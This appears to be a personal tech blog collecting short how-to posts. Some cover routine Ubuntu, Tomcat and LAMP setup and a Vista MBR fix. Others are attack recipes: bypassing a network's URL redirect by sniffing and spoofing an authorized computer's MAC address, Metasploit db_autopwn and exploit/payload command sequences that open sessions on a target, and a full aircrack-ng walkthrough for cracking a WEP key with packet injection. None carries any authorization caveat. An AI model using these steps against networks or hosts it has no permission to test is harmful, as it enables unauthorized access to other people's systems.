Bypass URL Redirects with MAC Spoofing
It's not difficult to bypass a URL redirect by spoofing the MAC address of an authorized computer. All you need is a laptop and Wireshark.
Here are the steps:
- Boot to Linux and verify that your eth0 connection is enabled and connected to the network. You can check this my running: ifconfig
- Next run wireshark
- Click on the Start Capture button and then select the configuration button for you eth0 device
- Create a filter that only captures Ethernet ARP packets
- Start the capture
- Wait until another computer connects to the network (this may take some time to get a machine that is authorized)
- When they communicate with the server an ARP packet will be sent with that computers MAC address
- Record the MAC address and stop the capture
- Open a terminal
- Type: macchanger --mac <copy the new MAC address here> eth0
- Check that your MAC address is now the same as the other computer: ifconfig
- Type: /etc/init.d/networking stop
- Type: /etc/init.d/networking start
- Open a browser and verify to that you now bypass the URL redirect and can now browse the internet
Metasploit db_autopwn
./msfconsole
db_create test
db_hosts
db_nmap IP ADDRESS TO TEST -p PORT
db_hosts
db_autopwn -t -p -e -s -b
sessions -l
sessions -i
Restore VISTA MBR (if the traditional methods are failing)
- Download and install EasyBCD
- Click on the Manage Bootloader button
- Make sure "Reinstall the Vista Bootloader" is selected
- Hit the "Write MBR" button
- Re-start your machine
Your Vista Bootloader should be restored.
Synaptic not showing all packages
On a fresh VMware install of Ubuntu 8.10 I ran into the problem where additional packages weren't showing up in the Synaptic Package Manager. I've seen this before and have previously been able to resolve it. Once and for all I'm going to blog the fix so I can find it for future reference.
- Open up a terminal
- Enter the command: sudo update-apt-xapian-index
- Restart Synaptic Package Manager when the update is complete
- You may need to reload the package information by clicking Ctrl-R
- It should work fine now
Hope this can help other people annoyed by this problem.
Setup a Tomcat server in Ubuntu
Install the required packages (either using "apt-get install" in the terminal or from the package manager), then follow the instructions to configure it:
- tomcat5.5
- tomcat5.5-admin
- tomcat5.5-webapps
- sun-java6-jdk
Tomcat needs to know where the jdk is.
Open /etc/default/tomcat5.5 in a text editor.
Change the line that starts:
#JAVA_HOME.
to read:
JAVA_HOME=/usr/lib/jvm/java-6-sun
** This assumes that you have java 6 installed. Check that you have that folder.
Update the tomcat security policy:
sudo gedit /etc/tomcat5.5/policy.d/03catalina.policy
At the very end of the file, add the lines:
grant {
permission java.net.AllPermission;
permission java.net.SocketPermission "localhost:3306", "connect";
};
Next you need to import a .jar into your Tomcat. To do so go to http://dev.mysql.com/downloads/connector/j/5.1.html and download the tar file. When it asks if you have registered look below and where it says 'No Thanks'. Double click on the downloaded tar file and extract. Go into the newly created folder and run:
sudo cp mysql-connector-java-5.1.5-bin.jar /usr/share/tomcat5.5/server/lib/
This will copy that jar file into the library for jsp.
Restart your tomcat server:
sudo /etc/init.d/tomcat5.5 restart
Setup LAMP in Ubuntu
1. Install Apache2
- Start the package manager by going to the menu: "System>Administration>Synaptic Package Manager"
- Enter your password to allow the program to run.
- Search for the package named "apache2" by clicking the search button on the menu bar.
- Find the package named exactly "apache2"
- Click the check box next to the package and choose "Mark for installation" from the pop up menu.
- A window will appear asking if additional changes should be made. These are other packages that apache2 requires to function properly. Choose the button that says "Mark".
- Apply the changes by clicking the "Apply" button from the menu
- Note: You can select as many packages as you want before applying changes. For example you could install Apache2 at the same time as you install MySQL.
2. Install MySQL and PHP
Search for and install these packages from the package manager:
- php5-mysql
- mysql-server
- mysql-client
- phpmyadmin (installer will ask what server to connect to. Choose apache2.)
- libapache2-mod-auth-mysql
3. Configure phpmyadmin
To set up under Apache all you need to do is include the following line in /etc/apache2/apache2.conf, first type the following command to open up this file:
sudo gedit /etc/apache2/apache2.conf
Add the following line of code inside apache2.conf:
Include /etc/phpmyadmin/apache.conf
Now restart Apache:sudo /etc/init.d/apache2 restart
4. Test it out...
Open up a browser and type "http://127.0.1.1/" into the address bar. If a page comes up that says "It works!" your Apache server is running and configured. Now point to "http://127.0.1.1/phpmyadmin" and verify that the phpmyadmin page comes up.
Cracking WEP
I've looked at several different methods for cracking WEP... this is what worked for me:
Because my onboard wireless NIC does not support packet injection I used my wireless USB adapter to do this in BackTrack 4.
Setup your adapter:
Code:
airmon-ng stop wlan0 ifconfig wlan0 down macchanger --mac 00:11:22:33:44:55 wlan0 airmon-ng start wlan0
Start up Kismet from the command line and start collecting information (look for the WEP network you want to crack and record the channel, BSSID, and ESSID):
Code:
kismet
Open a new terminal session. Plug the values you collected from kismet into the command below (you may want to create and browse to a temporary directory because this will create several files that will dumped into the present working directory):
Code:
airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0 --ivs
Next you'll want to create another terminal session and begin authentication with the router:
Code:
aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
At this point open another terminal and begin packet injection (this should bump up your packet collection significantly):
Code:
aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0
The final step to the crack is simple. Point aircrack-ng to the .ivs file that airodump-ng created. It will process until there are enough packets collected and then give you the WEP key.
Code:
aircrack-ng -s /wep_router.ivs
This should do it... I'll tweak this as go to make it better. Feel free to give feedback if you have suggestions or changes.
BT4 and rausb0 (the driver I used in BT3)
After much trial, I finally figured out how to configure my USB wireless adapter that utilized the rausb0 driver in BackTrack 3. Since moving over to BackTrack 4 I haven't been able to use my external USB adapter.
Below is the command I was using with the resulting error:
rausb0: ERROR while getting interface flags: No such device
I finally figured out that they have updated the driver for my Hawking device to use the wlan0 driver instead. I'm not sure how this works for other devices but it fixed my problem. New command:
root@bt:~#
Success!
Metasploit Quick Tutorial
>: /pentest/exploits/framework3
>: ./msfconsole
msf > use exploit/...
msf > set PAYLOAD ...
msf > set RHOST ...
msf > set RPORT ...
msf > set LHOST ...
msf > set LPORT ...
msf > exploit
BAM